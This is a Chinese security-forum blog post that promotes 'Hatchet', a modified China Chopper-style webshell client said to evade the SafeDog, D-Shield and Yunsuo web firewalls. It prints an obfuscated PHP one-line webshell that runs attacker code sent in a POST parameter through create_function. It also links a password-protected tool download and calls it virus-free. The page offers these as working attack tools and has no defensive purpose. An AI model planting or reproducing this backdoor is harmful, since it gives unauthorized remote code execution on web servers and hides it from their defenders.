PHPINFO为广大热爱网络技术的朋友无私的提供最新网络教程、网络工具、网络攻防、BUG漏洞,在这里能学到更好的网络技术技巧与经验!致力于安全研究 程序开发!
文章59 浏览73943

最新过狗/过盾/过某锁菜刀(Hatchet)发布!

【摘要】 Hatchet--别名斧头!类似于中国菜刀。 唯一弱点:  存在细节方面没处理好  数据库与菜刀有所区别不能共用 但是Hatchet是开源的,...

Hatchet--别名斧头!类似于中国菜刀。

唯一弱点:
 存在细节方面没处理好
 数据库与菜刀有所区别不能共用

但是Hatchet是开源的,这都是可以去优化的!

==================================

今天在群里看到小伙伴们在聊过狗菜刀,无意间有位小伙伴提到了这个Hatchet,然后问他拿了套源码,自己动手鼓捣了一番,也不能说无视所有,狗+锁+盾测试都没什么问题!

---------下面是安全狗测试过程--------------------

 

2.png

这是我在自己服务器上搭建的一个空站,下载了最新版的安全狗,还配上一个过狗的一句话,安全狗是扫描不出来的。默认防护等级是初级的,我已经调试到了高级!

1.png

 

完全查找不出。这个一句话也会在下面贴上,然后接着是测试原版Hatchet菜刀连接:

caidao.png

 

毫无疑问,提示被拦截,然后我又在网上找了一款标题为"过狗过盾的中国菜刀"测试了一遍,结果如下:

caidao2.png

 

一样被拦截了,可能规则都已经失效了!后面贴上我们改写的Hatchet测试。

guogou.png

 

~~~~~~~~~~~~~完美收工!

 

一句话:

<?php
$args = 1;
$arr=array("n;}$_POST[function];/*"=>"test");
$arr1=array_flip($arr);
$arr2 = $arr1[test];
create_function('$args',$arr2); 
?>

菜刀下载:

 

 


Hatchet.zip大小:814KB | 来源:PHPINFO.CC
已经过安全软件检测无毒,请您放心下载。


解压密码:www.phpinfo.cc

相关推荐:

发表评论

游客 表情
看不清楚?点图切换 送你一朵小花花~

众说纷纭(0)